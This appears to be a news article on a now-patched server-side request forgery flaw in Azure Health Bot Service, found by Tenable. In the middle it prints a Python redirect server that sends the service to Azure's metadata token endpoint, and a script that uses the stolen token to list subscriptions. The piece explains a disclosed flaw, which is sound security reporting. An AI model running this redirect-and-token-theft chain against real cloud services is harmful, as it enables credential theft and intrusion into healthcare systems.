Microsoft has fixed a serious vulnerability in Azure Health Bot Service, an AI-powered tool that lets developers build and deploy virtual health assistants. The flaw, identified by cybersecurity firm Tenable, put patients' confidential data at risk because it could have allowed malicious actors to move laterally through the IT infrastructure of healthcare organizations.
Azure Health Bot Service is designed to help healthcare organizations reduce costs and improve efficiency without compromising regulatory compliance. However, any service that handles large amounts of sensitive information makes data security a crucial concern. Tenable analyzed how the chatbot manages its workloads and discovered a series of flaws in a feature known as "Data Connections," which is designed to pull data from external services.
Although this feature has built-in safeguards to block unauthorized access to internal APIs, the researchers managed to bypass these protections with a redirect trick: they set up an external host under their control and configured it to answer the service's requests with 301 redirects pointing to Azure's Instance Metadata Service (IMDS).
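To make the mechanics concrete, here is a minimal sketch, in Python, of the kind of attacker-controlled redirect server described above. The port and host setup are illustrative, not Tenable's actual proof of concept; the IMDS token endpoint and its api-version parameter are Azure's documented values. Note that IMDS additionally requires a `Metadata: true` request header, so the technique also depends on being able to influence the headers of the server-side request.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Azure's documented IMDS token endpoint. It is only reachable from inside
# Azure, which is why the redirect must be followed by the service itself.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every request with a 301 pointing at IMDS, so that the
        # server-side client fetching this "data connection" is steered
        # into the internal metadata endpoint.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    # Illustrative port; the host simply needs to be reachable by the service.
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()
```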

This maneuver caused the service to follow the redirect and return a valid metadata response, which contained an access token for management.azure.com. With this token, the researchers were able to list the subscriptions accessible to that identity, exposing potentially sensitive information.
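For illustration, here is a short sketch of that follow-on step against Azure's public Resource Manager API. The subscriptions endpoint and its api-version are documented Azure values; the token is a placeholder standing in for whatever the metadata response returned.

```python
import json
import urllib.request

# Placeholder: in the scenario above, this value came from the IMDS response.
ACCESS_TOKEN = "<access token from the metadata response>"

# Documented Azure Resource Manager endpoint for listing subscriptions
# visible to the identity behind the bearer token.
req = urllib.request.Request(
    "https://management.azure.com/subscriptions?api-version=2020-01-01",
    headers={"Authorization": f"Bearer {ACCESS_TOKEN}"},
)
with urllib.request.urlopen(req) as resp:
    for sub in json.load(resp)["value"]:
        print(sub["subscriptionId"], sub.get("displayName"))
```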
The experts at Tenable, who reported these findings to Microsoft a few months ago, emphasized that the vulnerability stemmed not from flaws in the AI models themselves but from the underlying architecture of the chatbot service. Once notified, Microsoft acted quickly and patched the vulnerability in all affected regions. So far, no evidence has emerged that the flaw was exploited in real environments, suggesting that the corrective measures were timely and effective.